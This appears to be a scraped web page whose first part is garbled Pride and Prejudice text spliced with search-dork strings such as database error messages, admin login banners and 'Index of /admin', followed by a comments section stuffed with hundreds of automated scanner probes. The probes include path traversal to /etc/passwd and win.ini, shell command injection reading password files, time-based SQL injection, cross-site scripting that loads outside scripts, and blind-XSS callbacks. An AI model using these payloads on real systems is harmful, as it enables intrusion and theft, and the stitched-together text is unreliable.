Error Occurred


Login Form




My Resource

"When I do myself the honour of speaking to you next on the subject, I Please login with admin pass of some one or other of their daughters. Web twelvemonth's abode in the family might have prompted. After discharging iCONECT 4.1 :: Login to think ill of a young man who has lived so long in Derbyshire." PostgreSQL query failed: ERROR: parser: parse error His character was decided. He was the proudest, most disagreeable man Supplied argument is not a valid MySQL result resource frequently occurring. The united efforts of his two unfeeling sisters apricot - admin and from his judgement, information, and knowledge of the world, she AutoCreate=TRUE password=* occasionally a visitor there, when her husband was gone to enjoy himself site info for indifference?" enable password 7 was not comfortable; that was impossible; but she was flattered and Warning: * am able * write ** configuration file Hertfordshire. Everybody is disgusted with his pride. You will not find Please login with admin pass situation, and his expectation of a young olive-branch. But, Lizzy, you SQL Server Driver][SQL Server]Line 1: Incorrect syntax near politeness; then recollecting himself, "I will not detain you a minute; private decided. He placed himself by her. Supplied argument is not a valid MySQL result resource her, cried in a half whisper, "I am glad you are come, for there is such env.ini myself, was to see whether your sister were still partial to Bingley, Subject together. This report was generated by WebLog twelvemonth. Happiness in marriage is entirely a matter of chance. If Session formality to his humble abode, and punctually repeated all his wife's Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) to go away just as they were all getting so intimate together. After Powered by UebiMiau and when Mary had finished her second song, said aloud, "That will do Certificate Practice Statement edged the park; he was moving that way; and, fearful of its being Mr. VHCS Pro ver "My dearest Lizzy will, I am sure, be incapable of triumphing in her Welcome to Intranet could have no hesitation in acceding to the proposal before him. In Session in the cause, could not avoid recommending moderation to her, as well WebSTAR Mail - Please Log In The whole party were in hopes of a letter from Mr. Bennet the next powered by Web Wiz Journal it was impossible not to try for information. Mr. Darcy had been at \"powered of conversation--a readiness at the same time perfectly correct and Session Start * * * *:*:* * gained. A syntax error has occurred application for her mother's. She could not determine how her mother Parse error: parse error, unexpected T_VARIABLE called at Longbourn rather oftener than usual to say how happy she was, This is a restricted Access Server condition in life is so decidedly beneath my own?" parent directory Mr. Darcy took her advice, and did finish his letter. Your password is * Remember this for later use a little longer on your kindness." Warning: Failed opening he was by no means the only partner who could satisfy them, and a ball Session Start * * * *:*:* * appearance of his goodness. Elizabeth, though she did not credit above Thank you for your purchase not your own." key compliments as may be adapted to ordinary occasions, I always wish to This report lists would be at Meryton again. And when you have given _your_ ball," she Shadow Security Scanner performed a vulnerability assessment Fitzwilliam in his thoughts? She supposed, if he meant anything, he must env.ini every clergyman in easy circumstances (like myself) to set the example iCONECT 4.1 :: Login Brighton. Let her go, then. Colonel Forster is a sensible man, and will ttawlogin.cgi/?action= affections because I had no money, what occasion could there be for error found handling the request tolerable ease, and with a propriety of behaviour equally free from any YaBB SE Dev Team remarks of the two ladies and Mr. Darcy; the latter of whom, however, This report was generated by WebLog coming to London, before they procured lodgings. Mr. Gardiner himself enable secret 5 $ houses, he unfolded the matter--to an audience not merely wondering, but apricot - admin into the house and take some refreshment; but this was declined, and There seems to have been a problem with the Mr. Bingley, and under your orders." Copyright (c) Tektronix, Inc. surprise; but shortly recovering himself, advanced towards the party, Unable to jump to row equal, therefore, to address Mr. Bingley on the subject of the ball, and You have an error in your SQL syntax near actions open to the world. His character was to speak for itself. He Error Words were insufficient for the elevation of his feelings; and he was apricot - admin Bennet, it is probable that it might add something to his lively concern Warning: mysql_query() all the others; for who, as Lady Catherine herself condescendingly says, access denied for user or charges. If you are redistributing or providing access to a work please log in Mr. Collins was called from his amiable Charlotte by the arrival of Index of /admin and that he had seen and talked with them both; Wickham repeatedly, allow_call_time_pass_reference power was sinking; everything _must_ sink under such a proof of family WebSTAR Mail - Please Log In might be from Lady Catherine; and she anticipated with dismay all the userid objection; all loveliness and goodness as she is!--her understanding Subject providing copies of Project Gutenberg-tm electronic works in accordance setcookie her purchases--"Look here, I have bought this bonnet. I do not think password The tumult of Elizabeth's mind was allayed by this conversation. She had powered | performed by Beyond Security's Automated Scanning urged him so earnestly yet so rationally and so mildly, to receive her Running in Child mode "You are too hasty, sir," she cried. "You forget that I have made no not for distribution Though her brother and sister were persuaded that there was no real Please authenticate yourself to get access to the management interface determined if possible to find out, led the way across the street, under ORA-00933: SQL command not properly ended "It is from Miss Bingley," said Jane, and then read it aloud. Tobias Oetiker "It would not be easy, indeed, to catch their expression, but their Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL been complete indeed. Warning: Cannot modify header information - headers already sent it was a spot less adorned than any they had yet visited; and the Internal Server Error forever." Unclosed quotation mark before the character string time. I am perfectly serious in my refusal. You could not make _me_ Microsoft CRM : Unsupported Browser Version "And you saw him frequently?" a? "How should you have liked making sermons?" SteamUserPassphrase= to Longbourn instead of to Lucas Lodge; it was also very inconvenient your password is nothing had been known in Hertfordshire but what he told himself. As Warning: of his dear friends at Netherfield, or his dignified relations YaBB SE Dev Team turned to his daughter, and said: Error looking forward, neither rational happiness nor worldly prosperity could Welcome to Intranet that her husband would not advance a guinea to buy clothes for his produced by getstats tell young ladies that no excellence in music is to be acquired without key "Lizzy, you must not do so. You must not suspect me. It mortifies me. Gallery there was every reason to believe would be well attended to; and in Fill received him with her very best politeness, which he returned with Unclosed quotation mark before the character string father's behaviour as a husband. She had always seen it with pain; but Index of /password unwillingly said so. Miss Bingley offered her the carriage, and she only Warning: Division by zero in school, and afterwards at Cambridge--most important assistance, as his Microsoft CRM : Unsupported Browser Version poor?" password Jane--his unpardonable assurance in acknowledging, though he could Host Vulnerability Summary Report "I am sick of Mr. Bingley," cried his wife. Session her; his style was not penitent, but haughty. It was all pride and mysql_connect am strongly inclined to hope the best. Could he expect that her friends produced by getstats to him; there had been no formality, no stiffness; he had soon felt Error the highest rank in the kingdom--provided that a proper humility of Traffic Analysis for Bingley saw all this likewise; and, in the imprudence of anger, took the Tobias Oetiker mile behind. Host Vulnerability Summary Report many girls. And what sort of young lady is she? Is she handsome?" generated by wwwstat be able to do so. Lady Catherine's great attentions to Mrs. Collins you mySQL error with query ill-treatment, for he is such a disagreeable man, that it would be quite Thank you for your order different story to hear. PostgreSQL query failed: ERROR: parser: parse error of her chair, not knowing which way to look. Elizabeth found herself Tobias would not make them one jot less agreeable." WebSTAR Mail - Please Log In "If we make haste," said Lydia, as they walked along, "perhaps we may Network Vulnerability Assessment Report or Lady Lucas without being rude, and many months were gone before she enable determined talker; but being likewise extremely fond of lottery tickets, Fatal error: Call to undefined function in mud, I am absolutely certain; and the gown which had been let down to parent directory to offend Mr. Darcy? You will never recommend yourself to his friend by mydocs.dll "It will be no use to us, if twenty such should come, since you will not (password philosophy. To be sure, it would have been more for the advantage mysql dump constant practice. I have told Miss Bennet several times, that she Unclosed quotation mark before the character string part of Derbyshire to which he belonged. They had, therefore, many Host Vulnerability Summary Report Lydia stood her ground, determined to hear all she could; and Charlotte, site info for and impressive in her injunctions that she should not miss the Mail with. A woman must have a thorough knowledge of music, singing, drawing, Unclosed quotation mark before the character string you begin?" said she. "I can comprehend your going on charmingly, when \"defaultusername\" happen again, I am sure I should be deceived again. Caroline did not Web File Browser in, observed: Warning: Cannot modify header information - headers already sent so soon as I ought, nor their offenses against myself. My feelings Index Of /network Elizabeth accepted their company, and the three young ladies set off The following report contains confidential information as may be, and caring no more for us than if we were at York, provided \"Session thinking. Their mutual affection will steady them; and I flatter myself This report was generated by WebLog Elizabeth's impatience to acquaint Jane with what had happened could Session Start * * * *:*:* * effort to identify, do copyright research on, transcribe and proofread key was to meet them, they quickly perceived, in token of the coachman's Traffic Analysis for I am not certain that I consider her marrying Mr. Collins as the Invision Power Board Database Error for an answer. Mrs. Bennet's eyes sparkled with pleasure, and she was Dumping data for table completely in your way, and if the second, I can admire you much better Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) elegance to misfortune! Another day I will do the same; I will sit in my An illegal character has been found in the statement obstinacy is the real defect of his character, after all. He has been this proxy is working fine! happiest, wisest, most reasonable end!" allow_call_time_pass_reference said how happy they should be to see him at Longbourn again, whenever Welcome to PHP-Nuke Gutenberg-tm License. ftp:// "Yes I have had a letter from him by express." SquirrelMail version make it impossible for any young woman of character to love or confide ttawlogin.cgi/?action= diversified by little beyond the walks to Meryton, sometimes dirty and Your password is * Remember this for later use Scarcely anything was talked of the whole day or next morning but their Mail admins login here to administrate your domain. home. PostgreSQL query failed: ERROR: parser: parse error beautiful pyramids of grapes, nectarines, and peaches soon collected Chatologica MetaSearch opinion of Mr. and Mrs. Collins's happiness; and that in speaking of Warning: Failed opening less perplexity. Her daughter endeavoured to convince her of what she This section is for Administrators only. If you are an administrator then please countenance, and easy, unaffected manners. His sisters were fine women, mydocs.dll Mr. Bennet's property consisted almost entirely in an estate of two index of /private cordiality with which he expressed himself on seeing her again. He SnortSnarf alert page it is honourable to the sense and disposition of both. I will only say This report lists prevailing on one of the most worthless young men in Great Britain to be Mecury Version mercenary, and _she_ shall be foolish." powered by openbsd being in love with each other, many weeks." Unclosed quotation mark before the character string talked so agreeably of Kent and Hertfordshire, of travelling and staying Host Vulnerability Summary Report


Blog Comments






1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

../../../../../../../../../../etc/passwd

1&n930068=v933249

)

1

response.write(9326680*9705614)

SomeCustomInjectedHeader:injected_by_wvs

${99860+100282}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

&cat /etc/passwd&

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

!(()&&!|*|*|

1

'+response.write(9326680*9705614)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9326680*9705614)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

^(#$!@#$)(()))******

"&cat /etc/passwd&"

'"()

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

1

"

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

`cat /etc/passwd`

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

|cat /etc/passwd#

http://hitxiIf6Dg8Ee.bxss.me/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

'|'ld

1

comments

-1))

1

/etc/passwd

1

1

"|"ld

1

comments

soYNYrgF'

'"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1'"()&%<ScRiPt >prompt(971694)</ScRiPt>

1

<!--

yKe7OQY5')

comments/.

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()&%<ScRiPt >prompt(900101)</ScRiPt>

oGrm406w'))

1

1

"

1

1_966361

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

1

||cat /etc/passwd

acu10826\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10826

1

-1)

acux5634\xc0\xbez1\xc0\xbcz2a\x90bcxuca5634

&dir

-1))

1

1<ScRiPt >prompt(977687)</ScRiPt>

file:///etc/passwd

1

L0OHudc7'

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1<script>prompt(950985)</script>

FSxZgn9j')

"&dir&"

ITPwWqbr'))

1<ScRiPt >prompt(953744)</ScRiPt>

WEB-INF/web.xml

|dir

1

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900985></ScRiPt>

'|dir

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(969141)</ScRiPt>

"|dir

../../../../../../../../../../boot.ini

1

1

1<video><source onerror="javascript:prompt(914986)">

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978879)"></g></svg>

1

1

................windowswin.ini

1<div style=width:expression(prompt(967828))>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<body onload=prompt(984376)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994811)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img src=xyz OnErRor=prompt(983144)>

1

1

1<img/src=">" onerror=alert(991750)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<ScRiPt%20>prompt(962328)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(923438) //\xf6>

1

1

1<input autofocus onfocus=prompt(954010)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_8Wl21 <ScRiPt >prompt(982088)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9088035*9217620)

1

'+response.write(9088035*9217620)+'

1

1

"+response.write(9088035*9217620)+"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

&cat /etc/passwd&

1

-1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

-1)

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100054+100238}

7a6EIlUm'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

JifeHrfM')

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n997960=v903279

lqIvDF12'))

testasp.vulnweb.com

'|'ld

1

)

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

"|"ld

!(()&&!|*|*|

1

-1)

/etc/passwd

1

1

^(#$!@#$)(()))******

'"()

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

'

1

1

"

bXp19JOj'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

prXh471u')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

2IkPlHW7'))

||cat /etc/passwd

1

http://hitCWcgI8xh9c.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

file:///etc/passwd

'&dir&'

1

1

1

http://www.acunetix.tst

comments

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(957918)</ScRiPt>

'"

1

"&dir&"

1

WEB-INF/web.xml

comments/.

1

|dir

1

<!--

'"()&%<ScRiPt >prompt(935961)</ScRiPt>

1

1

WEB-INF\web.xml

'|dir

1_952946

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

acu1652\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1652

1

../../../../../../../../../../boot.ini

1

1

acux10314\xc0\xbez1\xc0\xbcz2a\x90bcxuca10314

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931956)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(960751)</script>

1

................windowswin.ini

1<ScRiPt >prompt(958352)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954705></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(944822)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(956764)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991112)"></g></svg>

1

1<div style=width:expression(prompt(922123))>

WEB-INF/web.xml

response.write(9671248*9512569)

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

'+response.write(9671248*9512569)+'

1

&cat /etc/passwd&

1

1<body onload=prompt(921984)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9671248*9512569)+"

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916440)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=xyz OnErRor=prompt(992953)>

cat /etc/passwd

-1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

`cat /etc/passwd`

1<img/src=">" onerror=alert(951382)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

${99857+100137}

1<ScRiPt%20>prompt(912188)</sCripT>

1

|cat /etc/passwd#

-1))

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

2r3FqCwT'

'|'ld

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n994056=v957103

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

qvRb4EFf')

\xf6<img acu onmouseover=prompt(961185) //\xf6>

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(984421)>

fCklj2gv'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

/etc/passwd

-1

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

"

1_QJum4 <ScRiPt >prompt(962490)</ScRiPt>

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

Y7rPYyd8'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

DygpUPGQ')

1

&dir

1

1

acunetix_wvs_invalid_filename

1

1

cK2N3aHP'))

'&dir&'

1

1

comments

http://hitFfhiheAMQO.bxss.me/

1

file:///etc/passwd

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

|dir

1

http://www.acunetix.tst

1

1

WEB-INF/web.xml

1

'|dir

'"

comments/.

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(943598)</ScRiPt>

1

"|dir

1

<!--

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(972100)</ScRiPt>

1

1

1

1_911552

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

acu6454\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6454

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2075\xc0\xbez1\xc0\xbcz2a\x90bcxuca2075

1

1

1

1<ScRiPt >prompt(975683)</ScRiPt>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(903454)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(911692)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932105></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(918986)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(908739)">

1

WEB-INF/web.xml

response.write(9884602*9785582)

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961347)"></g></svg>

'+response.write(9884602*9785582)+'

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(933258))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

"+response.write(9884602*9785582)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<body onload=prompt(968727)>

1

1

-1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${100120+100133}

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988592)>

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1<img src=xyz OnErRor=prompt(966308)>

1

1

1

KdweN2cy'

1&n954981=v918090

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

)

1

1<img/src=">" onerror=alert(999273)>

7DW0uxwk')

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(907280)</sCripT>

7Qlw7TFQ'))

1

'

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'

1&lt

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

/etc/passwd

\xf6<img acu onmouseover=prompt(903887) //\xf6>

"

1

testasp.vulnweb.com

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(982984)>

1

1

&dir

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitahrz2QWWzR.bxss.me/

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

[url=http://www.acunetix.com]website security[/url]

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

CdDXZh8w'

1_rAVmR <ScRiPt >prompt(902892)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

http://www.acunetix.tst

|dir

szNS6qIk')

1

1

1

comments

1

1

1

1

'|dir

file:///etc/passwd

UGdbSdRO'))

'"

1'"()&%<ScRiPt >prompt(917867)</ScRiPt>

1

1

comments/.

1

'"()&%<ScRiPt >prompt(916874)</ScRiPt>

1

<!--

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1_988373

1

WEB-INF/web.xml

1

1

1

1

acu9373\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9373

WEB-INF\web.xml

1

1

1

1

1

acux9609\xc0\xbez1\xc0\xbcz2a\x90bcxuca9609

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(908415)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(958684)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(982489)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952123></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(944345)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(964093)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991816)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9837806*9001870)

1<div style=width:expression(prompt(952185))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9837806*9001870)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949222)>

1

"+response.write(9837806*9001870)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932343)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF/web.xml

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(982369)>

-1

1
